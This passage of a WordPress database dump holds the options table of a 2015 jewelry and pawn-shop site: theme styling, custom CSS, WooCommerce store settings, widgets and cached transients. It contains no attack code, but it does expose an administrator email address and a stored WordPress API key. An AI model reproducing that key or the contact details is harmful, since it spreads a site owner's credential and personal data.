more\";s:9:\"post_meta\";s:4:\"line\";s:17:\"post_meta_display\";s:9:\"only_post\";s:9:\"post_date\";s:3:\"yes\";s:11:\"post_author\";s:3:\"yes\";s:14:\"post_permalink\";s:3:\"yes\";s:13:\"post_category\";s:3:\"yes\";s:8:\"post_tag\";s:2:\"no\";s:12:\"post_comment\";s:3:\"yes\";s:10:\"post_views\";s:2:\"no\";s:9:\"post_like\";s:2:\"no\";s:12:\"post_dislike\";s:2:\"no\";s:12:\"folio_filter\";s:3:\"cat\";s:20:\"folio_filter_orderby\";s:4:\"name\";s:18:\"folio_filter_order\";s:3:\"ASC\";s:11:\"folio_title\";s:3:\"yes\";s:13:\"folio_excerpt\";s:3:\"yes\";s:19:\"folio_excerpt_count\";s:2:\"20\";s:9:\"folio_btn\";s:3:\"yes\";s:17:\"folio_button_text\";s:9:\"Read more\";s:10:\"folio_meta\";s:3:\"yes\";s:14:\"folio_lightbox\";s:3:\"yes\";s:19:\"single_folio_layout\";s:4:\"grid\";s:21:\"single_gallery_layout\";s:4:\"grid\";s:11:\"layout_mode\";s:7:\"fitRows\";s:19:\"folio_posts_orderby\";s:4:\"date\";s:17:\"folio_posts_order\";s:4:\"DESC\";s:12:\"items_count2\";s:1:\"8\";s:12:\"items_count3\";s:1:\"9\";s:12:\"items_count4\";s:2:\"12\";s:11:\"footer_text\";s:0:\"\";s:7:\"ga_code\";s:0:\"\";s:8:\"feed_url\";s:0:\"\";s:11:\"footer_menu\";s:4:\"true\";s:22:\"footer_menu_typography\";a:6:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:28:\"Arial, Helvetica, sans-serif\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#0088CC\";}s:13:\"cookie_banner\";s:2:\"no\";s:18:\"cookie_banner_text\";s:84:\"We use Cookies - By using this site or closing this you agree to our Cookies policy.\";}','yes'),(165,'theme_mods_theme49507','a:2:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:11:\"header_menu\";i:6;s:9:\"shop_menu\";i:7;}}','yes'),(166,'theme49507','a:108:{s:15:\"body_background\";a:5:{s:5:\"color\";s:7:\"#222222\";s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:8:\"position\";s:10:\"top center\";s:10:\"attachment\";s:6:\"scroll\";}s:11:\"main_layout\";s:5:\"fixed\";s:15:\"main_background\";s:0:\"\";s:17:\"header_background\";a:5:{s:5:\"color\";s:0:\"\";s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:8:\"position\";s:10:\"top center\";s:10:\"attachment\";s:6:\"scroll\";}s:11:\"links_color\";s:7:\"#e74c3c\";s:17:\"links_color_hover\";s:7:\"#222222\";s:14:\"google_mixed_3\";a:6:{s:4:\"size\";s:4:\"18px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#000000\";}s:10:\"h1_heading\";a:6:{s:4:\"size\";s:4:\"30px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"36px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h2_heading\";a:6:{s:4:\"size\";s:4:\"22px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"22px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h3_heading\";a:6:{s:4:\"size\";s:4:\"18px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h4_heading\";a:6:{s:4:\"size\";s:4:\"14px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h5_heading\";a:6:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#333333\";}s:10:\"h6_heading\";a:6:{s:4:\"size\";s:4:\"12px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#333333\";}s:15:\"g_search_box_id\";s:3:\"yes\";s:16:\"g_breadcrumbs_id\";s:3:\"yes\";s:10:\"custom_css\";s:584:\".shop-nav,\r\n.row-top-cart { /* Hide e-commerce */\r\n display:none;\r\n}\r\n.camera_wrap.camera.motopress-camera {\r\n height:400px!important;\r\n}\r\n#squares {\r\n position:relative;\r\n display:block;\r\n overflow:auto;\r\n margin:-50px 0px 0px 135px; /* centered */\r\n \r\n}\r\n#squares img {\r\n float:left; /* Home page squares */\r\n}\r\n\r\n.slider-full {\r\n background-color:#000;\r\n}\r\n\r\np.logo_tagline {\r\n color:#fff; /* white text in header, below logo */\r\n}\r\ndiv.footer-widgets {\r\n padding-top:0px; /* was 60 px, too much space */\r\n}\r\n\r\n@media (min-width: 1200px) {\r\n.span4 {\r\nwidth: 345px;\r\n}\r\n}\";s:9:\"logo_type\";s:10:\"image_logo\";s:15:\"logo_typography\";a:6:{s:4:\"size\";s:4:\"70px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"78px\";s:5:\"color\";s:0:\"\";}s:8:\"logo_url\";s:85:\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/all-that-glitters-25-years.png\";s:7:\"favicon\";s:68:\"http://atgjewelry.com/fuze7/wp-content/themes/theme49507/favicon.ico\";s:15:\"menu_typography\";a:6:{s:4:\"size\";s:4:\"16px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#ffffff\";}s:8:\"sf_delay\";s:4:\"1000\";s:14:\"sf_f_animation\";s:5:\"false\";s:15:\"sf_sl_animation\";s:4:\"show\";s:8:\"sf_speed\";s:6:\"normal\";s:9:\"sf_arrows\";s:5:\"false\";s:17:\"mobile_menu_label\";s:14:\"Navigate to...\";s:12:\"stickup_menu\";s:5:\"false\";s:11:\"slider_type\";s:13:\"camera_slider\";s:20:\"slider_posts_orderby\";s:8:\"modified\";s:18:\"slider_posts_order\";s:3:\"ASC\";s:9:\"sl_effect\";s:10:\"simpleFade\";s:10:\"sl_columns\";s:2:\"12\";s:7:\"sl_rows\";s:1:\"8\";s:9:\"sl_banner\";s:6:\"fadeIn\";s:12:\"sl_pausetime\";s:4:\"7000\";s:18:\"sl_animation_speed\";s:4:\"1500\";s:12:\"sl_slideshow\";s:4:\"true\";s:13:\"sl_thumbnails\";s:5:\"false\";s:14:\"sl_control_nav\";s:5:\"false\";s:10:\"sl_dir_nav\";s:4:\"true\";s:15:\"sl_dir_nav_hide\";s:5:\"false\";s:20:\"sl_play_pause_button\";s:5:\"false\";s:17:\"sl_pause_on_hover\";s:4:\"true\";s:9:\"sl_loader\";s:2:\"no\";s:13:\"acc_show_post\";a:4:{i:198;s:1:\"0\";i:194;s:1:\"0\";i:196;s:1:\"0\";i:200;s:1:\"0\";}s:13:\"acc_slideshow\";s:4:\"true\";s:15:\"acc_hover_pause\";s:4:\"true\";s:13:\"acc_pausetime\";s:4:\"6000\";s:19:\"acc_animation_speed\";s:3:\"600\";s:10:\"acc_easing\";s:12:\"easeOutCubic\";s:11:\"acc_trigger\";s:9:\"mouseover\";s:18:\"acc_starting_slide\";s:1:\"0\";s:9:\"blog_text\";s:4:\"Blog\";s:12:\"blog_related\";s:13:\"Related Posts\";s:16:\"blog_sidebar_pos\";s:5:\"right\";s:15:\"post_image_size\";s:6:\"normal\";s:17:\"single_image_size\";s:5:\"large\";s:19:\"single_share_button\";s:4:\"true\";s:10:\"load_image\";s:4:\"true\";s:12:\"post_excerpt\";s:4:\"true\";s:16:\"blog_button_text\";s:9:\"Read more\";s:17:\"post_meta_display\";s:9:\"only_post\";s:9:\"post_date\";s:3:\"yes\";s:11:\"post_author\";s:3:\"yes\";s:14:\"post_permalink\";s:3:\"yes\";s:13:\"post_category\";s:3:\"yes\";s:8:\"post_tag\";s:2:\"no\";s:12:\"post_comment\";s:3:\"yes\";s:10:\"post_views\";s:2:\"no\";s:9:\"post_like\";s:2:\"no\";s:12:\"post_dislike\";s:2:\"no\";s:12:\"folio_filter\";s:3:\"cat\";s:20:\"folio_filter_orderby\";s:4:\"name\";s:18:\"folio_filter_order\";s:3:\"ASC\";s:11:\"folio_title\";s:3:\"yes\";s:13:\"folio_excerpt\";s:3:\"yes\";s:19:\"folio_excerpt_count\";s:2:\"20\";s:9:\"folio_btn\";s:3:\"yes\";s:17:\"folio_button_text\";s:9:\"Read more\";s:10:\"folio_meta\";s:3:\"yes\";s:14:\"folio_lightbox\";s:3:\"yes\";s:19:\"single_folio_layout\";s:4:\"grid\";s:21:\"single_gallery_layout\";s:4:\"grid\";s:11:\"layout_mode\";s:7:\"fitRows\";s:19:\"folio_posts_orderby\";s:4:\"date\";s:17:\"folio_posts_order\";s:4:\"DESC\";s:12:\"items_count2\";s:1:\"8\";s:12:\"items_count3\";s:1:\"9\";s:12:\"items_count4\";s:2:\"12\";s:11:\"footer_text\";s:126:\"2015 Copyright. All That Glitters, Inc. All rights reserved. | Pawnbroker\'s License Numbers: P300, P276, P307, P264 & P278\";s:7:\"ga_code\";s:0:\"\";s:8:\"feed_url\";s:0:\"\";s:11:\"footer_menu\";s:4:\"true\";s:22:\"footer_menu_typography\";a:6:{s:4:\"size\";s:4:\"16px\";s:4:\"face\";s:6:\"Roboto\";s:9:\"character\";s:5:\"latin\";s:5:\"style\";s:6:\"normal\";s:10:\"lineheight\";s:4:\"18px\";s:5:\"color\";s:7:\"#ffffff\";}s:13:\"cookie_banner\";s:2:\"no\";s:18:\"cookie_banner_text\";s:84:\"We use Cookies - By using this site or closing this you agree to our Cookies policy.\";s:15:\"empty_cart_mess\";s:24:\"No products in the cart.\";s:13:\"prod_per_page\";s:1:\"6\";s:22:\"cat_title_length_limit\";s:0:\"\";s:13:\"cat_show_desc\";s:3:\"yes\";s:16:\"cat_show_details\";s:2:\"no\";s:16:\"login_display_id\";s:3:\"yes\";s:10:\"site_admin\";s:15:\"Site %username%\";s:7:\"log_out\";s:7:\"Log out\";s:7:\"sign_up\";s:12:\"Registration\";s:7:\"sign_in\";s:6:\"Log In\";s:12:\"live_chat_id\";s:0:\"\";}','yes'),(167,'woocommerce_default_country','GB','yes'),(168,'woocommerce_allowed_countries','all','yes'),(169,'woocommerce_specific_allowed_countries','','yes'),(170,'woocommerce_demo_store','no','yes'),(171,'woocommerce_demo_store_notice','This is a demo store for testing purposes — no orders shall be fulfilled.','no'),(172,'woocommerce_api_enabled','yes','yes'),(173,'woocommerce_currency','GBP','yes'),(174,'woocommerce_currency_pos','left','yes'),(175,'woocommerce_price_thousand_sep',',','yes'),(176,'woocommerce_price_decimal_sep','.','yes'),(177,'woocommerce_price_num_decimals','2','yes'),(178,'woocommerce_enable_lightbox','yes','yes'),(179,'woocommerce_enable_chosen','yes','no'),(180,'woocommerce_shop_page_id','6','yes'),(181,'woocommerce_shop_page_display','','yes'),(182,'woocommerce_category_archive_display','','yes'),(183,'woocommerce_default_catalog_orderby','title','yes'),(184,'woocommerce_cart_redirect_after_add','no','yes'),(185,'woocommerce_enable_ajax_add_to_cart','yes','yes'),(186,'woocommerce_weight_unit','kg','yes'),(187,'woocommerce_dimension_unit','cm','yes'),(188,'woocommerce_enable_review_rating','yes','no'),(189,'woocommerce_review_rating_required','yes','no'),(190,'woocommerce_review_rating_verification_label','yes','no'),(191,'woocommerce_review_rating_verification_required','no','no'),(192,'shop_catalog_image_size','a:3:{s:5:\"width\";s:3:\"150\";s:6:\"height\";s:3:\"150\";s:4:\"crop\";i:1;}','yes'),(193,'shop_single_image_size','a:3:{s:5:\"width\";s:3:\"300\";s:6:\"height\";s:3:\"300\";s:4:\"crop\";i:1;}','yes'),(194,'shop_thumbnail_image_size','a:3:{s:5:\"width\";s:2:\"90\";s:6:\"height\";s:2:\"90\";s:4:\"crop\";i:1;}','yes'),(195,'woocommerce_file_download_method','force','no'),(196,'woocommerce_downloads_require_login','no','no'),(197,'woocommerce_downloads_grant_access_after_payment','yes','no'),(198,'woocommerce_manage_stock','yes','yes'),(199,'woocommerce_hold_stock_minutes','60','no'),(200,'woocommerce_notify_low_stock','yes','no'),(201,'woocommerce_notify_no_stock','yes','no'),(202,'woocommerce_stock_email_recipient','daniel@tualatinweb.com','no'),(203,'woocommerce_notify_low_stock_amount','2','no'),(204,'woocommerce_notify_no_stock_amount','0','no'),(205,'woocommerce_hide_out_of_stock_items','no','yes'),(206,'woocommerce_stock_format','','yes'),(207,'woocommerce_calc_taxes','no','yes'),(208,'woocommerce_prices_include_tax','no','yes'),(209,'woocommerce_tax_based_on','shipping','yes'),(210,'woocommerce_default_customer_address','base','yes'),(211,'woocommerce_shipping_tax_class','title','yes'),(212,'woocommerce_tax_round_at_subtotal','no','yes'),(213,'woocommerce_tax_classes','Reduced Rate\r\nZero Rate','yes'),(214,'woocommerce_tax_display_shop','excl','yes'),(215,'woocommerce_price_display_suffix','','yes'),(216,'woocommerce_tax_display_cart','excl','no'),(217,'woocommerce_tax_total_display','itemized','no'),(218,'woocommerce_enable_coupons','yes','no'),(219,'woocommerce_enable_guest_checkout','yes','no'),(220,'woocommerce_force_ssl_checkout','no','yes'),(221,'woocommerce_unforce_ssl_checkout','no','yes'),(222,'woocommerce_cart_page_id','7','yes'),(223,'woocommerce_checkout_page_id','8','yes'),(224,'woocommerce_terms_page_id','','no'),(225,'woocommerce_checkout_pay_endpoint','order-pay','yes'),(226,'woocommerce_checkout_order_received_endpoint','order-received','yes'),(227,'woocommerce_myaccount_add_payment_method_endpoint','add-payment-method','yes'),(228,'woocommerce_calc_shipping','yes','yes'),(229,'woocommerce_enable_shipping_calc','yes','no'),(230,'woocommerce_shipping_cost_requires_address','no','no'),(231,'woocommerce_shipping_method_format','','no'),(232,'woocommerce_ship_to_destination','shipping','no'),(233,'woocommerce_ship_to_countries','','yes'),(234,'woocommerce_specific_ship_to_countries','','yes'),(235,'woocommerce_myaccount_page_id','9','yes'),(236,'woocommerce_myaccount_view_order_endpoint','view-order','yes'),(237,'woocommerce_myaccount_edit_account_endpoint','edit-account','yes'),(238,'woocommerce_myaccount_edit_address_endpoint','edit-address','yes'),(239,'woocommerce_myaccount_lost_password_endpoint','lost-password','yes'),(240,'woocommerce_logout_endpoint','customer-logout','yes'),(241,'woocommerce_enable_signup_and_login_from_checkout','yes','no'),(242,'woocommerce_enable_myaccount_registration','no','no'),(243,'woocommerce_enable_checkout_login_reminder','yes','no'),(244,'woocommerce_registration_generate_username','yes','no'),(245,'woocommerce_registration_generate_password','no','no'),(246,'woocommerce_email_from_name','fuze7','no'),(247,'woocommerce_email_from_address','daniel@tualatinweb.com','no'),(248,'woocommerce_email_header_image','','no'),(249,'woocommerce_email_footer_text','fuze7 - Powered by WooCommerce','no'),(250,'woocommerce_email_base_color','#557da1','no'),(251,'woocommerce_email_background_color','#f5f5f5','no'),(252,'woocommerce_email_body_background_color','#fdfdfd','no'),(253,'woocommerce_email_text_color','#505050','no'),(1015,'woocommerce_db_version','2.3.7','yes'),(1016,'woocommerce_version','2.3.7','yes'),(680,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1425966545','yes'),(260,'_transient_woocommerce_cache_excluded_uris','a:0:{}','yes'),(681,'_site_transient_poptags_40cd750bba9870f18aada2478b24840a','a:40:{s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";s:4:\"4916\";}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"Post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";s:4:\"3078\";}s:6:\"plugin\";a:3:{s:4:\"name\";s:6:\"plugin\";s:4:\"slug\";s:6:\"plugin\";s:5:\"count\";s:4:\"3022\";}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";s:4:\"2529\";}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";s:4:\"2346\";}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";s:4:\"1892\";}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";s:4:\"1729\";}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";s:4:\"1680\";}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";s:4:\"1678\";}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";s:4:\"1676\";}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";s:4:\"1612\";}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";s:4:\"1609\";}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";s:4:\"1505\";}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"Facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";s:4:\"1322\";}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";s:4:\"1276\";}s:9:\"wordpress\";a:3:{s:4:\"name\";s:9:\"wordpress\";s:4:\"slug\";s:9:\"wordpress\";s:5:\"count\";s:4:\"1175\";}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";s:4:\"1171\";}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";s:4:\"1083\";}s:6:\"social\";a:3:{s:4:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";s:4:\"1079\";}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";s:3:\"918\";}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";s:3:\"905\";}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";s:3:\"874\";}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";s:3:\"843\";}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";s:3:\"837\";}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";s:3:\"794\";}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";s:3:\"758\";}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"AJAX\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";s:3:\"748\";}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";s:3:\"709\";}s:11:\"woocommerce\";a:3:{s:4:\"name\";s:11:\"woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:5:\"count\";s:3:\"700\";}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";s:3:\"692\";}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";s:3:\"682\";}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";s:3:\"657\";}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";s:3:\"649\";}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";s:3:\"642\";}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";s:3:\"642\";}s:9:\"ecommerce\";a:3:{s:4:\"name\";s:9:\"ecommerce\";s:4:\"slug\";s:9:\"ecommerce\";s:5:\"count\";s:3:\"623\";}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";s:3:\"620\";}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";s:3:\"605\";}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"Share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";s:3:\"600\";}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";s:3:\"593\";}}','yes'),(264,'woocommerce_meta_box_errors','a:0:{}','yes'),(274,'woocommerce_permalinks','a:4:{s:13:\"category_base\";s:0:\"\";s:8:\"tag_base\";s:0:\"\";s:14:\"attribute_base\";s:0:\"\";s:12:\"product_base\";s:0:\"\";}','yes'),(266,'wpcf7','a:1:{s:7:\"version\";s:5:\"4.1.1\";}','yes'),(267,'recently_activated','a:1:{s:21:\"thickbox/thickbox.php\";i:1425932790;}','yes'),(1020,'woocommerce_language_pack_version','a:2:{i:0;s:5:\"2.3.7\";i:1;s:5:\"en_US\";}','yes'),(279,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(280,'category_children','a:0:{}','yes'),(281,'_transient_product_query-transient-version','1425938633','yes'),(673,'_transient_product-transient-version','1425938633','yes'),(292,'_site_transient_timeout_browser_87cc63479cc0690b252ac01679a120b9','1423948015','yes'),(293,'_site_transient_browser_87cc63479cc0690b252ac01679a120b9','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"40.0.2214.94\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(1011,'_transient_timeout_wc_admin_report','1427145249','no'),(1012,'_transient_wc_admin_report','a:1:{s:32:\"051db7e995a1f83ee9cffb0262a7df93\";a:0:{}}','no'),(302,'widget_my_facebook_widget','a:2:{i:5;a:14:{s:5:\"title\";s:8:\"Facebook\";s:12:\"facebook_URL\";s:85:\"https://www.facebook.com/pages/All-That-Glitters-Jewelry-Loans-Tigard/476226449137549\";s:9:\"box_width\";s:4:\"100%\";s:10:\"box_height\";s:4:\"100%\";s:12:\"color_scheme\";s:4:\"dark\";s:14:\"display_haeder\";s:2:\"on\";s:13:\"display_faces\";s:2:\"on\";s:14:\"display_stream\";s:2:\"on\";s:14:\"display_border\";s:2:\"on\";s:45:\"cherry_widget_rules_type_my_facebook_widget-5\";s:3:\"all\";s:40:\"cherry_widget_rules_my_facebook_widget-5\";s:0:\"\";s:47:\"cherry_widget_custom_class_my_facebook_widget-5\";s:0:\"\";s:45:\"cherry_widget_responsive_my_facebook_widget-5\";s:19:\"visible-all-devices\";s:40:\"cherry_widget_users_my_facebook_widget-5\";s:3:\"all\";}s:12:\"_multiwidget\";i:1;}','yes'),(709,'_site_transient_timeout_browser_7bd4ff0616bbc6334d91aff5d2683d71','1426612467','yes'),(710,'_site_transient_browser_7bd4ff0616bbc6334d91aff5d2683d71','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"40.0.2214.115\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(434,'_site_transient_timeout_browser_cd94554e3128d66afcbaab0c67c94302','1424643561','yes'),(435,'_site_transient_browser_cd94554e3128d66afcbaab0c67c94302','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"35.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(1044,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1427106779','no'),(1045,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1427063579','no'),(650,'jqlb_help_text','','yes'),(651,'jqlb_automate','1','yes'),(652,'jqlb_comments','1','yes'),(653,'jqlb_resize_on_demand','0','yes'),(654,'jqlb_show_download','0','yes'),(655,'jqlb_navbarOnTop','0','yes'),(656,'jqlb_resize_speed','400','yes'),(565,'akismet_strictness','1','yes'),(566,'akismet_show_user_comments_approved','0','yes'),(567,'wordpress_api_key','62ce39afa4c4','yes'),(1013,'_wc_session_1','a:19:{s:4:\"cart\";s:6:\"a:0:{}\";s:15:\"applied_coupons\";s:6:\"a:0:{}\";s:23:\"coupon_discount_amounts\";s:6:\"a:0:{}\";s:27:\"coupon_discount_tax_amounts\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:19:\"cart_contents_total\";i:0;s:20:\"cart_contents_weight\";i:0;s:19:\"cart_contents_count\";i:0;s:5:\"total\";i:0;s:8:\"subtotal\";i:0;s:15:\"subtotal_ex_tax\";i:0;s:9:\"tax_total\";i:0;s:5:\"taxes\";s:6:\"a:0:{}\";s:14:\"shipping_taxes\";s:6:\"a:0:{}\";s:13:\"discount_cart\";i:0;s:14:\"shipping_total\";i:0;s:18:\"shipping_tax_total\";i:0;s:9:\"fee_total\";i:0;s:4:\"fees\";s:6:\"a:0:{}\";}','no'),(965,'_site_transient_browser_6238cea627222878a95f1d89ccf84123','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"41.0.2272.101\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(964,'_site_transient_timeout_browser_6238cea627222878a95f1d89ccf84123','1427566677','yes'),(614,'_site_transient_timeout_browser_32a4deac9f9909e92a3f597868ec7b58','1426535039','yes'),(615,'_site_transient_browser_32a4deac9f9909e92a3f597868ec7b58','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"40.0.2214.115\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(661,'widget_nav_menu','a:2:{i:2;a:7:{s:5:\"title\";s:22:\"Additional Information\";s:8:\"nav_menu\";i:6;s:35:\"cherry_widget_rules_type_nav_menu-2\";s:3:\"all\";s:30:\"cherry_widget_rules_nav_menu-2\";s:0:\"\";s:37:\"cherry_widget_custom_class_nav_menu-2\";s:0:\"\";s:35:\"cherry_widget_responsive_nav_menu-2\";s:19:\"visible-all-devices\";s:30:\"cherry_widget_users_nav_menu-2\";s:3:\"all\";}s:12:\"_multiwidget\";i:1;}','yes'),(1046,'_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109','1427106779','no'),(1047,'_transient_feed_b9388c83948825c1edaef0d856b7b109','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n 